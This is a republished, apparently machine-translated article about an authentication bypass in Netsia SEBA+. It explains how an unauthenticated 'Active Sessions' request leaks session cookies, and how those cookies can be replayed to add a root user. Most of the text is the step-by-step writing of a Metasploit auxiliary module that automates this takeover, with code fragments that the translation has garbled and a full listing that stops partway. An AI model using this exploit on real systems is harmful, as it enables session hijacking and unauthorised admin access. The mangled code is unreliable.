Shulou(Shulou.com)05/31 Report--

Editor to share with you about the example analysis of Netsia-SEBA authentication bypass loopholes, I believe that most people do not know much about it, so share this article for your reference, I hope you can learn a lot after reading this article, let's go to know it!

Loophole analysis

Unfortunately, because I don't have access to the product's source code, I can't describe the original cause of the vulnerability in detail.

In the application, the HTTP request for the "Active Sessions" part can be accessed by the root/admin user without any session (cookie) information. Therefore, we can read the session cookie information content of the active user in the application from the response.

It is important to note that we cannot send similar requests elsewhere in the application. In other words, we can send such a request without session information only here in "Active Sessions".

By executing the "GET / session/list/allActiveSession" request, we can get the cookie value of the authorized user by getting the session information returned by the response.

At this point, we have a cookie value on hand, but the session is likely to end soon. So the best attack vector is to create a new user.

Therefore, we can add a new root user to the application with the data necessary for the request in the "POST / authentication server/user/add" field.

In the attack performed in the figure above, after obtaining the cookie value of the logged-in user, an unauthorized attacker can create a new user with full privileges by placing this cookie value in the user add request, as shown in the following figure:

As shown in the figure above, the HTTP response indicates that the requested user has been successfully added. Later, the attacker can easily use this user with full privileges to log in to the application and perform all other actions.

Exploit Advanced Development (MSF:Auxiliary) about Auxiliary module

The Metasploit framework includes hundreds of auxiliary modules that perform scanning, blurring (vulnerability checking), sniffing, and so on. Although these modules will not give you a shell, they are very valuable for penetration testing. "show auxiliary" can display all auxiliary modules:

Vulnerability exploitation modules are usually written to execute commands on the system, while MSF's Auxiliary is suitable for a variety of common types of vulnerabilities, such as obtaining information from the target host or exploiting existing vulnerabilities in the target host to create new attack vectors.

Therefore, we can use MSF's Auxiliary module to exploit this vulnerability.

Class MetasploitModule

< Msf::Auxiliary 此时不会生成Payload，因为我们没有选择Msf::Exploit::Remote。 接下来，我们将分配用户名和密码作为注册选项。这里使用的是Rex::Text.rand_text_alphanumeric()函数来生成密码随机值，该功能可以为漏洞利用提供便利。 register_options( [ Opt::RPORT(443), OptString.new('USERNAME', [true, 'The username for your new account']), OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)]) ]) 接下来，请求"/session/list/allActiveSession"，并根据响应进行检查。如果响应中包含"sessionId"，则表示存在活动会话。如果没有"sessionId"且包含"SUCCESS"，则表示应用程序易受攻击，但没有活动会话。 def check begin res = send_request_cgi( 'method' =>

'GET',' uri' = > normalize_uri (target_uri.path, "session", "list", "allActiveSession"),) rescue return Exploit::CheckCode::Unknown end if res.code = = 200 and res.body.include? 'sessionId' return Exploit::CheckCode::Vulnerable else if res.code = = 200and res.body.include? 'SUCCESS' print_status ("Target is vulnerable! But active admin session was not found. Try again later.") Return Exploit::CheckCode::Appears end end return Exploit::CheckCode::Safe End

The inspection module described above is sufficient to complete this process, and we do not need to let Auxiliary run unnecessary detection, because there is no point in doing anything else if the target is not vulnerable.

Unless Exploit::CheckCode::Vulnerable = = check fail_with (Failure::NotVulnerable, 'Target is not vulnerable.') End

Next, we can start writing exploit code.

First, we need to know how many active sessions there are in the Netsia SEBA+ application. Because there can be multiple users active, some of them may not be authorized users, and we need to use the most privileged active users to attack. So I decided to create a separate counting method.

Def count_user (data, find_string) data.scan (/ (? = # {find_string}) /) .count End

We will specify the HTTP response as data and look for the string "sessionId". In this way, the number of "sessionId" in the returned response means that as many users are active, and we need to extract these session ID values later.

Res = send_request_cgi ('method' = >' GET', 'uri' = > normalize_uri (target_uri.path, "session", "list", "allActiveSession"),) sescount = count_user (res.body,' "name"') print_good ("Currently # {sescount} active sessions have been detected.")

The above section completes the first step, and then you need to extract the sessionID value.

The part between "sessionId": "and" action "is the value of sessionId in the response. We can use the scan () function to search for regular expressions ([\ s] *?). To achieve our goal.

Cookies = res.body.scan (/ sessionId ":" ([\ s] *?) "," action/)

In the above process, cookies [0] will be the sessionID value of the first user, and cookies [1] will be the sessionID value of the second user, with a count of + 1.

Now, we will apply a very simple vector for development.

We will send a user creation request that contains all the active cookie values, and no matter which of these cookies is authorized, it will create a new user in the user database we want.

Here I choose to use the while loop. For example, there are seven active users, and this loop will add + 1 to the value in the cookies [int] variable and make various possible requests.

While $i' POST', 'ctype' = >' application/json', 'uri' = > normalize_uri (target_uri.path,' authentication-server', 'user',' add'), 'cookie' = > cookie,' data' = > json_data}) End

A loop like the one above is sufficient for this vector. Finally, we need to check whether the request is successful.

If the required user is created, it provides information and returns the newly created user information.

If res.code = = 200and res.body.include? '"SUCCESS"' print_good ("Excellent! User # {datastore [" USERNAME "]} was added successfully with root, admin and default privileges.") Print_good ("Username: # {datastore [" USERNAME "]}") print_good ("Password: # {datastore [" PASSWORD "]}") break End exploit practice

Now that the Auxiliary module is complete, let's put it all together:

# This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework## class MetasploitModule

< Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' =>

'Netsia SEBA+

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.